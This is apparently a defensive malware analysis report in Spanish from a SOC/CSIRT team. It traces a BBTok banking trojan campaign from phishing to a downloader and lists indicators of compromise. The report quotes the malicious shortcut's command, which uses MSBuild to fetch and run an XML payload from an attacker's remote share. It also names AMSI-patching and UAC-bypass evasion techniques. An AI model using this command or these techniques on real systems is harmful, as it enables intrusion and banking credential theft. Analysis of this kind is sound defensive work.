Análisis de Malware - Caso: troyano bancario BBTok
Julio de 2025
Embedded Files
Introducción
Introducción
Durante lo que va del 2025, el phishing ha aumentado como método de entrega de malware y las campañas de propagación se van dirigiendo hacia usuarios corporativos debido a que representan mayores opciones de capitalización, por un lado, pueden robar credenciales o accesos que se venden en mercados negros (que aumentan su valor cuando son corporativos), además, pueden continuar la cadena de infección hacia amenazas más severas como el ransomware1 o la exfiltración.
A continuación, presentamos un caso de estudio de una muestra analizada por los equipos de Respuesta a Incidentes y el de Threat Hunting del SOC/CSIRT de DSI. El malware analizado pertenece a la familia conocida como BBTok, un famoso troyano bancario que se enfoca en México y Brasil y es conocido por su constante evolución de tácticas, técnicas y procedimientos.
Imagen 1. Diversos encabezados de noticias sobre el malware BBTok desde 2020.
Fase 1. Infección por medio de Phishing
Fase 1. Infección por medio de Phishing
Un correo suplantando la descarga de un archivo PDF con datos de una supuesta factura es entregado en la bandeja de correo del usuario [imagen 2], cuando hace clic en el enlace “Descargar factura”, se abre una ventana del navegador de internet en el dominio “filehosting.is-certified.com” que muestra la leyenda “Comprobante Fiscal Digital por Internet” [Imagen 3] y un enlace de descarga que a su vez, dirige al usuario al explorador de archivos, con un acceso directo que es creado específicamente para esa descarga, simulando ser un archivo PDF de una factura, adicionalmente, un archivo XML con el mismo nombre que el acceso directo [Imagen 4], cuando el usuario hace clic en el acceso directo pensando que es un archivo PDF, se ejecuta la segunda fase de la cadena de infección.
Imagen 2. Cadena de infección.
Imagen 3. Vista del correo de phishing enviado a empleados de Elektra, se aprecian algunas palabras en portugués.
Imagen 4. Imagen del sitio de descarga del supuesto "comprobante digital" en el dominio malicioso "filehosting.is-certified.com".
Imagen 5. Abuso de "search-ms" URI Protocol Handler para engañar al usuario y efectuar la "entrega" del archivo malicioso.
Imagen 6. Archivos descargados mediante el uso de tipo acceso directo o LNK que simula ser un archivo PDF, y el otro, un archivo XML que contiene las configuraciones para la ejecución de la siguiente fase del ataque.
Imagen 7. Al dar clic en el correo de phishing y aceptar la descarga del archivo, se crea un recurso de red compartido en el que se encuentran los archivos maliciosos LNK y XML.
Fase 2. Ejecución de software malicioso mediante “LoL Binaries”2 altamente evasivos.
Fase 2. Ejecución de software malicioso mediante “LoL Binaries”2 altamente evasivos.
En esta fase, el usuario ejecuta el acceso directo, el cual contiene el comando: “C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\filehosting[.]is-certified[.]com\\Downloads\\CFDI432197.xml”. MSBUILD.exe es un archivo legítimo de Windows que construye un programa con las configuraciones indicadas en el archivo XML descargado junto con el acceso directo malicioso, una vez ejecutado este comando, se realiza la conexión al servidor de comando y control (C2C) controlado por los atacantes mismo que verifica el user agent3 con la finalidad de evadir los análisis (como máquinas virtuales y sandbox4 automatizados) e infectar solamente a víctimas de las regiones de México y Brasil. Si el recurso se solicita con el user agent de un navegador o con un programa de línea de comandos como curl o wget, el servidor devuelve un mensaje 401 o "No autorizado", es capaz de detectar ambientes virtualizados, así como ubicar el origen de la dirección IP que realiza la petición, por lo que si la IP se encuentra fuera de México o Brasil devuelve otro mensaje y no continúa con la infección. Esta infraestructura sofisticada en el backend se encuentra documentada en otros análisis donde también se exponen algunas capacidades del servidor como por ejemplo infectar con distintos payloads dependiendo de las características de software y hardware del usuario, así como su capacidad para evadir el análisis.
Imagen 8. Al dar clic en las propiedades del archivo LNK (acceso directo) malicioso, se observa el comando que contiene el LOLBIN MSBUILD en la propiedad "destino".
Imagen 9. Elemento de configuración adjunto en el que se hace referencia al malware de nombrre Kammy pero con el nombre del archivo señuelo "CFDIXXXXXX.dll".
A partir de Windows 10 se integra una solución conocida como AMSI para identificar ataques basados en secuencias de comandos, AMSI es una interfaz que las aplicaciones y los servicios que se ejecutan en Windows pueden utilizar para enviar solicitudes de análisis al producto antimalware instalado en la computadora. Esto proporciona protección adicional contra software dañino.
La muestra de malware analizado utiliza una función disponible públicamente que es conocida como “amsi-patch” para evadir este mecanismo de seguridad.
Imagen 10. Porción del código que utiliza la función "amsi-patch" para evadir la seguridad de powershell.
2.1 Ofuscación de código.
2.1 Ofuscación de código.
Los métodos de ofuscación identificados en esta muestra:
Cadenas en Base64.
Nombres de variables y funciones con cadenas pseudo aleatorias.
Cadenas en orden inverso y función de “reverse()”.
Imagen 11. Porción de código donde se observa el método de ofuscación con base64.
2.2 Evasión de UAC (User Account Control)
2.2 Evasión de UAC (User Account Control)
El Control de Cuentas de Usuario, es una función de seguridad integrada de Windows que impide que usuarios y aplicaciones no autorizadas realicen cambios en el sistema. De forma predeterminada, ejecuta el software con los privilegios mínimos necesarios y solo solicita permisos de administrador cuando una modificación requiere acceso elevado.
Imagen 12. Ventana de advertencia de usuario en la que el usuario tiene que dar permisos para la ejecución con privilegios.
Esta variante de malware BBTok utiliza la técnica conocida como “eventvwr UAC bypass” con el objetivo de ejecutar el malware como administrador pasando desapercibido por el usuario final (es decir, que no muestre la ventana de advertencia).
Imagen 13. Fragmento de código que muestra la técnica de "eventvwr UAC bypass" así como la ofuscación con cadenas invertidas.
Fase 3. Ejecución de software malicioso de la familia BBTok (1era fase: Downloader)
Fase 3. Ejecución de software malicioso de la familia BBTok (1era fase: Downloader)
Una vez que el servidor de C2C6 (“Comando y Control” o “Command and Control”) verifica que la petición se realizó desde el intérprete de comandos de Windows (como sería de esperarse si el malware se ejecutó mediante el acceso directo malicioso), así como verificar el origen de la dirección IP sea de México, procede a descargar el archivo "Kammy.dll", cuya función principal es la de realizar verificaciones adicionales antes de descargar el payload final. Estas verificaciones incluyen la recopilación de datos del equipo y la des-ofuscación de los siguientes IoCs7 de la cadena de infección. Para llevar a cabo la emulación de manera controlada se utilizaron comandos de Powershell de .NET que equivalen a la porción de código malicioso como se ve en los siguientes ejemplos.
Imagen 14. Emulación de código malicioso de manera controlada mediante las clases .NET de PowerShell.
Imagen 15. Archivo Kammy.dll identificado como malicioso por 31/64 motores antivirus.
Fase 4. Ejecución de payload[1] final (2da fase BBTok Banker).
Fase 4. Ejecución de payload[1] final (2da fase BBTok Banker).
El payload final no fue descargado en este caso de estudio, sin embargo, desde 2020 que se empezó a analizar esta familia de malware, se conoce que el este programa tiene la capacidad de emular las páginas de los principales bancos que operan en la región, incluso, de algunas plataformas de criptomonedas. De esta forma, engaña al usuario quien introduce sus credenciales y factores de autenticación adicionales para después ser enviados a los operadores de este grupo.
Indicadores de Compromiso.
Indicadores de Compromiso.
Se comparten los siguientes indicadores de compromiso identificados en la presente investigación:
538634d468c14b3f78884c65ea0e704ca1b13a6c5f9c32c669670b22cb9247ec
filehosting.is-certified.com/Downloads*
gsoftcentral.com
fairfieldinnontario.com
wavsearch.com
skemarangkaian.com
Referencias:
Referencias:
[BBTok: Analyzing Banking Malware] (https://emailsecurity.checkpoint.com/blog/bbtok-analyzing-banking-malware)
[Troyanos bancarios: Mekotio busca ampliar sus objetivos, BBTok abusa del comando de utilidad] (https://www.trendmicro.com/en_us/research/24/i/banking-trojans-mekotio-looks-to-expand-targets--bbtok-abuses-ut.html)
[Beyond File Search: A Novel Method for Exploiting the "search-ms" URI Protocol Handler] (https://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/)
[Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons] (https://isc.sans.edu/diary/28180)
[UAC - Cómo funciona el Control de cuentas de usuario] (https://learn.microsoft.com/es-es/windows/security/application-security/application-control/user-account-control/how-it-works)
[Detection: Eventvwr UAC Bypass] (https://research.splunk.com/endpoint/9cf8fe08-7ad8-11eb-9819-acde48001122/)
Page updated
Google Sites
Report abuse